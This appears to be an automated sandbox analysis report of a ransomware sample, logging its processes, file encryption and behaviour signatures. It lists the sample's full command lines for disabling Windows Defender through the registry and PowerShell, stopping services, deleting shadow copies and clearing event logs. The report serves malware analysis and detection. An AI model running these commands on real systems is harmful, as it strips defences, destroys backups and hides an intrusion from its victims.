Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 948 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 956 wrote to memory of 1408 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 956 wrote to memory of 1408 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 956 wrote to memory of 1408 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 956 wrote to memory of 1408 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 948 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 652 wrote to memory of 1176 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 652 wrote to memory of 1176 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 652 wrote to memory of 1176 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 652 wrote to memory of 1176 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 948 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 668 wrote to memory of 1492 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 668 wrote to memory of 1492 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 668 wrote to memory of 1492 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 668 wrote to memory of 1492 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 948 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 620 wrote to memory of 1572 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 620 wrote to memory of 1572 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 620 wrote to memory of 1572 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 620 wrote to memory of 1572 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 948 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 680 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 680 wrote to memory of 1540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 680 wrote to memory of 1540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 680 wrote to memory of 1540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 680 wrote to memory of 1540 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 948 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2032 wrote to memory of 1864 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2032 wrote to memory of 1864 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2032 wrote to memory of 1864 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2032 wrote to memory of 1864 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 948 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1636 wrote to memory of 896 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1636 wrote to memory of 896 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1636 wrote to memory of 896 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1636 wrote to memory of 896 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 948 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 948 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 1716 wrote to memory of 1444 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1716 wrote to memory of 1444 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1716 wrote to memory of 1444 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1716 wrote to memory of 1444 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe

"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"

C:\Windows\SysWOW64\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "VSS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net.exe stop "WebClient" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SysWOW64\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SysWOW64\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SysWOW64\wevtutil.exe

wevtutil.exe cl application

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

memory/956-55-0x0000000000000000-mapping.dmp

memory/1408-56-0x0000000000000000-mapping.dmp

memory/652-57-0x0000000000000000-mapping.dmp

memory/1176-58-0x0000000000000000-mapping.dmp

memory/668-59-0x0000000000000000-mapping.dmp

memory/1492-60-0x0000000000000000-mapping.dmp

memory/620-61-0x0000000000000000-mapping.dmp

memory/1572-62-0x0000000000000000-mapping.dmp

memory/680-63-0x0000000000000000-mapping.dmp

memory/1540-64-0x0000000000000000-mapping.dmp

memory/2032-65-0x0000000000000000-mapping.dmp

memory/1864-66-0x0000000000000000-mapping.dmp

memory/1636-67-0x0000000000000000-mapping.dmp

memory/896-68-0x0000000000000000-mapping.dmp

memory/1716-69-0x0000000000000000-mapping.dmp

memory/1444-70-0x0000000000000000-mapping.dmp

memory/1440-71-0x0000000000000000-mapping.dmp

memory/1660-72-0x0000000000000000-mapping.dmp

memory/968-73-0x0000000000000000-mapping.dmp

memory/1940-74-0x0000000000000000-mapping.dmp

memory/1752-75-0x0000000000000000-mapping.dmp

memory/2012-76-0x0000000000000000-mapping.dmp

memory/1948-77-0x0000000000000000-mapping.dmp

memory/584-78-0x0000000000000000-mapping.dmp

memory/1516-79-0x0000000000000000-mapping.dmp

memory/1488-80-0x0000000000000000-mapping.dmp

memory/1784-81-0x0000000000000000-mapping.dmp

memory/1528-82-0x0000000000000000-mapping.dmp

memory/428-83-0x0000000000000000-mapping.dmp

memory/812-84-0x0000000000000000-mapping.dmp

memory/1132-85-0x0000000000000000-mapping.dmp

memory/1444-86-0x0000000000000000-mapping.dmp

memory/1416-87-0x0000000000000000-mapping.dmp

memory/1336-88-0x0000000000000000-mapping.dmp

memory/1692-89-0x0000000000000000-mapping.dmp

memory/684-90-0x0000000000000000-mapping.dmp

memory/912-91-0x0000000000000000-mapping.dmp

memory/920-92-0x0000000000000000-mapping.dmp

memory/2040-93-0x0000000000000000-mapping.dmp

memory/1484-94-0x0000000000000000-mapping.dmp

memory/844-95-0x0000000000000000-mapping.dmp

memory/1864-96-0x0000000000000000-mapping.dmp

memory/1788-97-0x0000000000000000-mapping.dmp

memory/1764-98-0x0000000000000000-mapping.dmp

memory/1036-99-0x0000000000000000-mapping.dmp

memory/1952-100-0x0000000000000000-mapping.dmp

memory/1812-101-0x0000000000000000-mapping.dmp

memory/1148-102-0x0000000000000000-mapping.dmp

memory/1496-103-0x0000000000000000-mapping.dmp

memory/1612-104-0x0000000000000000-mapping.dmp

memory/1348-105-0x0000000000000000-mapping.dmp

memory/1740-106-0x0000000000000000-mapping.dmp

memory/1724-107-0x0000000000000000-mapping.dmp

memory/1028-108-0x0000000000000000-mapping.dmp

memory/1856-109-0x0000000000000000-mapping.dmp

memory/1212-110-0x0000000000000000-mapping.dmp

memory/1412-111-0x0000000000000000-mapping.dmp

memory/1016-112-0x0000000000000000-mapping.dmp

memory/1820-113-0x0000000000000000-mapping.dmp

memory/1972-114-0x0000000000000000-mapping.dmp

memory/360-115-0x0000000000000000-mapping.dmp

memory/896-116-0x0000000000000000-mapping.dmp

memory/1676-117-0x0000000000000000-mapping.dmp

memory/2096-118-0x0000000000000000-mapping.dmp

memory/2152-119-0x0000000075321000-0x0000000075323000-memory.dmp

memory/2152-120-0x00000000024D0000-0x000000000311A000-memory.dmp

memory/2152-121-0x00000000024D0000-0x000000000311A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 2884bf9a3a9322b7f7208c3c02a42ab1
SHA1 ed2787ea19b884a82f3bd74a9c192afb83c68a24
SHA256 1ec3c626334ca72f260eec75dade8fd55160e13cf2f8cf340087ae765575dda8
SHA512 667fd61ee74278c64f0bdf73e77383c6eacdb08dd710a13120997db455711dd993aea804dcf5056b4724db00ba027c3f5152423dd3f2c8dc61531fac7b8c1545

memory/2236-124-0x0000000002360000-0x0000000002FAA000-memory.dmp

memory/2236-125-0x0000000002360000-0x0000000002FAA000-memory.dmp

memory/2236-126-0x0000000002360000-0x0000000002FAA000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-13 13:01

Reported

2022-01-13 13:07

Platform

win10-en-20211208

Max time kernel

123s

Max time network

205s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\PublishInstall.png => C:\Users\Admin\Pictures\PublishInstall.png.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_2AZn_2ssug40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Users\Admin\Pictures\PublishInstall.png.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_2AZn_2ssug40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\officeinventoryagentlogon.xml.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_2hrCnYbOWJE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubLargeTile.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\offsyml.ttf C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\8498_20x20x32.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_ITq1Nq3t1ts0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_k6wEa505qq40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-ppd.xrm-ms.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_eadkSevqMG40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ppd.xrm-ms.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_3iFKz80LV9k0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Trial-pl.xrm-ms.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_EdXV4ugYLVI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\CameraIcon_contrast-white.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\WideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Retail-ul-phn.xrm-ms.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_MDE9PLW7-F40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosMedTile.contrast-black_scale-200.png C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui.KfKttpUx_zWLIj6PhwR85C4ajNEBlz3StmAO2K5kz_b_pE2OM9sWdFE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
